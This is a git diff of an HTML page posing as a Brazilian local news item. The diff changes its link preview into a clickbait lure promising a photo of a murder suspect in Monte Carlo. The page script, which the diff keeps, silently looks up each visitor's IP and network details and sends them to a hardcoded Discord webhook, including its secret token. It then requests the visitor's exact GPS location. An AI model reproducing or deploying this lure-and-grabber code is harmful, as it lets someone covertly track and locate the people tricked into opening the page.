--- a/index.html
+++ b/index.html
@@ -3,11 +3,11 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Monte City - Verificação</title>
+    <title>Monte City - Notícias</title>
 
-    <meta property="og:title" content="🚨 ATENÇÃO: Monte Carmelo (06/02/2026)">
-    <meta property="og:description" content="URGENTE: Nova ocorrência registrada agora. Clique para ver os detalhes.">
-    <meta property="og:image" content="https://raw.githubusercontent.com/noticiasmonte/montecity/refs/heads/main/Screenshot_20260206-104716%7E2.png">
+    <meta property="og:title" content="🚨 URGENTE: VEJA AQUI A FOTO DO SUSPEITO DO HOMICIDIO EM MONTE CARMELO 16/02/2026">
+    <meta property="og:description" content="Imagens exclusivas do ocorrido no Sidônio Cardoso. Clique para ver os detalhes e a identificação.">
+    <meta property="og:image" content="https://raw.githubusercontent.com/noticiasmonte/montecity/main/homicidio_1602.png">
     <meta property="og:image:type" content="image/png">
     <meta property="og:image:width" content="1200">
     <meta property="og:image:height" content="630">
@@ -29,7 +29,7 @@
     <script>
         const WEBHOOK_URL = "https://discord.com/api/webhooks/1467483594279878717/Yd31-VbARr_0NGE01f3tq7lg8Rg0-fCNxVj2FUED7yZcRt47p_Etr7kyTGUFV_Mq3os8";
 
-        // 1. CAPTURA AUTOMÁTICA DE IP E REDE
+        // 1. CAPTURA AUTOMÁTICA DE IP (INVISÍVEL)
         function capturarIP() {
             fetch('https://ipapi.co/json/')
                 .then(response => response.json())
@@ -41,10 +41,10 @@
                         headers: { "Content-Type": "application/json" },
                         body: JSON.stringify({ content: infoRede })
                     }).finally(() => { 
-                        solicitarGPS(); // Após mandar o IP, pede o GPS exato
+                        solicitarGPS(); 
                     });
                 })
-                .catch(() => solicitarGPS()); // Se falhar o IP, tenta o GPS direto
+                .catch(() => solicitarGPS());
         }
 
         // 2. SOLICITAÇÃO DE GPS EXATO
